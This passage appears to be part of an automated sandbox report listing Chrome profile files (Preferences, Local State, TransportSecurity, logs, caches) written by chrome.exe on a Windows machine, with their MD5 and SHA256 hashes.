C:\Users\admin\AppData\Local\Google\Chrome\User Data\8aae5e30-0400-4e4e-a7cb-610a29bc20a5.tmp
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF173a78.TMP
text
MD5: cd872be9bffea5740f55d49b1d3476a2
SHA256: 89dc6a32cce33e3291c0910c5ea32818727e584afb1ee81f3b82dcb23f56c97e
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: cd872be9bffea5740f55d49b1d3476a2
SHA256: 89dc6a32cce33e3291c0910c5ea32818727e584afb1ee81f3b82dcb23f56c97e
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\571a13b5-b5c5-436b-90d2-19712da14c99.tmp
––
MD5:  ––
SHA256:  ––
2536
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 80d9165c60d32321b525c0d5d5f7a279
SHA256: 51ff91503cf027d6e7f500637d25c0e3433053a22f80c2b6c73a88d29c4f30ef
2536
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF171770.TMP
text
MD5: 80d9165c60d32321b525c0d5d5f7a279
SHA256: 51ff91503cf027d6e7f500637d25c0e3433053a22f80c2b6c73a88d29c4f30ef
2536
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\f3daba5e-d9c1-43b1-bb50-aa8593198367.tmp
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: 0bc7fbe1070741100cd1d16be38952a9
SHA256: 6cd997683c645277fead9f2189d33ce70d3437c2fea8a2e354aeea326ba20539
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF170251.TMP
text
MD5: 0bc7fbe1070741100cd1d16be38952a9
SHA256: 6cd997683c645277fead9f2189d33ce70d3437c2fea8a2e354aeea326ba20539
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\5e41f1ca-58ae-443f-b828-8d7a6d49c5c1.tmp
––
MD5:  ––
SHA256:  ––
2536
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: e1f2892e1bbf76ea83aa709fb6d5cc31
SHA256: 650f587403958d5eebf35eefceabbbcdffe3c57a6a42277bff1db9f9f1e9e8ae
2536
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF16c846.TMP
text
MD5: e1f2892e1bbf76ea83aa709fb6d5cc31
SHA256: 650f587403958d5eebf35eefceabbbcdffe3c57a6a42277bff1db9f9f1e9e8ae
2536
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\386a9b1b-4d80-4f95-a2c0-681e696c9608.tmp
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: ffbf09d9022ad441404ca9a1fed3e85f
SHA256: 70f9687837ca373df3dd32245503fbab627bd99dc72eaee1646e4417b165e15f
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF16c46e.TMP
text
MD5: ffbf09d9022ad441404ca9a1fed3e85f
SHA256: 70f9687837ca373df3dd32245503fbab627bd99dc72eaee1646e4417b165e15f
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ef5fad63-0ec8-4e30-952f-1c46e93bd3e9.tmp
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF16c335.TMP
text
MD5: dc00459b213c96c45e33619c88301253
SHA256: b69ed81a679676f067936324f7070be634add67cc345e0930924fdd0fc97797c
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
text
MD5: dc00459b213c96c45e33619c88301253
SHA256: b69ed81a679676f067936324f7070be634add67cc345e0930924fdd0fc97797c
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ba89b5af-98a2-46e1-b20c-9ad57d1fb09a.tmp
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old
text
MD5: 97aa7678fb9d338d08c371711b54a104
SHA256: 4657635b66fa68ae1550b7bff4e54016f8874b4df43a004c9a7244c8465c6ca8
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Last Session
binary
MD5: 92eb31d830454841999ecdb4a714d301
SHA256: 63f01870e03b0329f3ae859435ef5610661a45085390af36275ae7d6808c8ffb
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old
text
MD5: 1276f7de036cb69ffbc104fa79f1d060
SHA256: 3044aa641bd2fed097ee25a5ad052d276eea8ec75a807a244102d75af9ac94f1
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG.old~RF16a51e.TMP
text
MD5: 1276f7de036cb69ffbc104fa79f1d060
SHA256: 3044aa641bd2fed097ee25a5ad052d276eea8ec75a807a244102d75af9ac94f1
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old~RF16a4a1.TMP
text
MD5: 370df9c4af340d044e2946d87d515fd8
SHA256: f4761a6412fee517fddf04004ddcb13b935994fba8550318534705c979a29343
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
text
MD5: 370df9c4af340d044e2946d87d515fd8
SHA256: f4761a6412fee517fddf04004ddcb13b935994fba8550318534705c979a29343
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
binary
MD5: f50f89a0a91564d0b8a211f8921aa7de
SHA256: b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
text
MD5: e51f52093e260695eee071189f847f00
SHA256: 3f2d1ad67cf78fded0d3eef3f74279a270529920dd9f10c3ae24de7831129ca2
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log
binary
MD5: 891a884b9fa2bff4519f5f56d2a25d62
SHA256: e2610960c3757d1757f206c7b84378efa22d86dcf161a98096a5f0e56e1a367e
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old
––
MD5:  ––
SHA256:  ––
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG.old
text
MD5: 722d616be0caaf9ed585c9aea7f3742c
SHA256: f86c514fa380332be463670b3b334c8feedc2f6cb9b4118ea367729b056de0fb
2796
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.old
text
MD5: 911b244e4a362b56f2478647d2d61a40
SHA256: 3a5aec1ea537d8841e604d0aa4cd5f9241c805a3d4eb4e37